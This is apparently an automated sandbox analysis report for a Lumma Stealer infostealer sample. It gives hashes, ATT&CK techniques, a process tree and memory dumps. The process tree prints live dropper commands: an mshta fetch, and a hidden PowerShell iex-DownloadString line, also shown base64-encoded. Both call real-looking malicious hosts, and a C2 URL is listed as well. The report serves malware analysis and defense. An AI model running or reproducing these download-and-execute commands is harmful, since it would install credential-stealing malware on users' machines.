lumma | 95cd2e94c29d862fd16c2cc19b0916784cf9ab2b93c7b9d816d34fe22ee239f7

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07/01/2025, 05:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

43B
MD5

cefc1c3285ecac3a02ccbc8e0cebb558
SHA1

7c2b049342ccd09474fcf8306c28c7d162c6d9b1
SHA256

95cd2e94c29d862fd16c2cc19b0916784cf9ab2b93c7b9d816d34fe22ee239f7
SHA512

b4a4dd60d8518e7629c6e5674d4cf185f7ce250f73dcfe110433d19933f2572bb814e54f234709a8d045f7c37a75298a36d537406c4002e4c0bb626c90eb22fc

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://simplerwebs.space/anrek.mp4

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://klipdiheqoe.shop/ruwkl.png

Extracted

Family

lumma

https://grooveoiy.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3424 created 3524	3424	powershell.exe	56

Blocklisted process makes network request 5 IoCs

flow	pid	Process
6	3752	mshta.exe
8	3752	mshta.exe
20	3424	powershell.exe
42	3696	powershell.exe
58	3696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3736	powershell.exe
3424	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3424 set thread context of 3696	3424	powershell.exe	104

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3736	powershell.exe
3736	powershell.exe
5040	powershell.exe
5040	powershell.exe
3424	powershell.exe
3424	powershell.exe
3424	powershell.exe
3424	powershell.exe
3424	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3736 wrote to memory of 3752	3736	powershell.exe	84
PID 3736 wrote to memory of 3752	3736	powershell.exe	84
PID 3752 wrote to memory of 5040	3752	mshta.exe	85
PID 3752 wrote to memory of 5040	3752	mshta.exe	85
PID 5040 wrote to memory of 3424	5040	powershell.exe	87
PID 5040 wrote to memory of 3424	5040	powershell.exe	87
PID 5040 wrote to memory of 3424	5040	powershell.exe	87
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104
PID 3424 wrote to memory of 3696	3424	powershell.exe	104

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://simplerwebs.space/anrek.mp4
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AawBsAGkAcABkAGkAaABlAHEAbwBlAC4AcwBoAG8AcAAvAHIAdQB3AGsAbAAuAHAAbgBnACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5040
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://klipdiheqoe.shop/ruwkl.png'))"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3424
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q0sbiofb.wj2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3424-118-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-40-0x0000000005A80000-0x0000000005AE6000-memory.dmp

Filesize
408KB

Download
memory/3424-1383-0x0000000022470000-0x00000000224C4000-memory.dmp

Filesize
336KB

Download
memory/3424-1382-0x0000000024150000-0x00000000246F4000-memory.dmp

Filesize
5.6MB

Download
memory/3424-37-0x0000000002930000-0x0000000002966000-memory.dmp

Filesize
216KB

Download
memory/3424-38-0x00000000053B0000-0x00000000059D8000-memory.dmp

Filesize
6.2MB

Download
memory/3424-39-0x00000000059E0000-0x0000000005A02000-memory.dmp

Filesize
136KB

Download
memory/3424-110-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-41-0x0000000005C20000-0x0000000005C86000-memory.dmp

Filesize
408KB

Download
memory/3424-51-0x0000000005C90000-0x0000000005FE4000-memory.dmp

Filesize
3.3MB

Download
memory/3424-1381-0x0000000007740000-0x000000000778C000-memory.dmp

Filesize
304KB

Download
memory/3424-53-0x0000000006270000-0x000000000628E000-memory.dmp

Filesize
120KB

Download
memory/3424-54-0x00000000062B0000-0x00000000062FC000-memory.dmp

Filesize
304KB

Download
memory/3424-55-0x0000000007AD0000-0x000000000814A000-memory.dmp

Filesize
6.5MB

Download
memory/3424-56-0x0000000006760000-0x000000000677A000-memory.dmp

Filesize
104KB

Download
memory/3424-58-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/3424-59-0x0000000022150000-0x0000000022284000-memory.dmp

Filesize
1.2MB

Download
memory/3424-60-0x0000000022280000-0x00000000223AA000-memory.dmp

Filesize
1.2MB

Download
memory/3424-64-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-62-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-82-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-86-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-98-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-122-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-1380-0x00000000223B0000-0x0000000022430000-memory.dmp

Filesize
512KB

Download
memory/3424-116-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-1379-0x00000000077A0000-0x0000000007824000-memory.dmp

Filesize
528KB

Download
memory/3424-68-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-114-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-108-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-106-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-104-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-102-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-100-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-120-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-96-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-94-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-92-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-90-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-88-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-84-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-78-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-76-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-74-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-72-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-70-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-112-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-67-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-80-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3424-61-0x0000000022280000-0x00000000223A3000-memory.dmp

Filesize
1.1MB

Download
memory/3736-15-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

Filesize
10.8MB

Download
memory/3736-0-0x00007FFB42953000-0x00007FFB42955000-memory.dmp

Filesize
8KB

Download
memory/3736-1-0x0000021CD5790000-0x0000021CD57B2000-memory.dmp

Filesize
136KB

Download
memory/3736-8-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

Filesize
10.8MB

Download
memory/3736-12-0x00007FFB42950000-0x00007FFB43411000-memory.dmp

Filesize
10.8MB

Download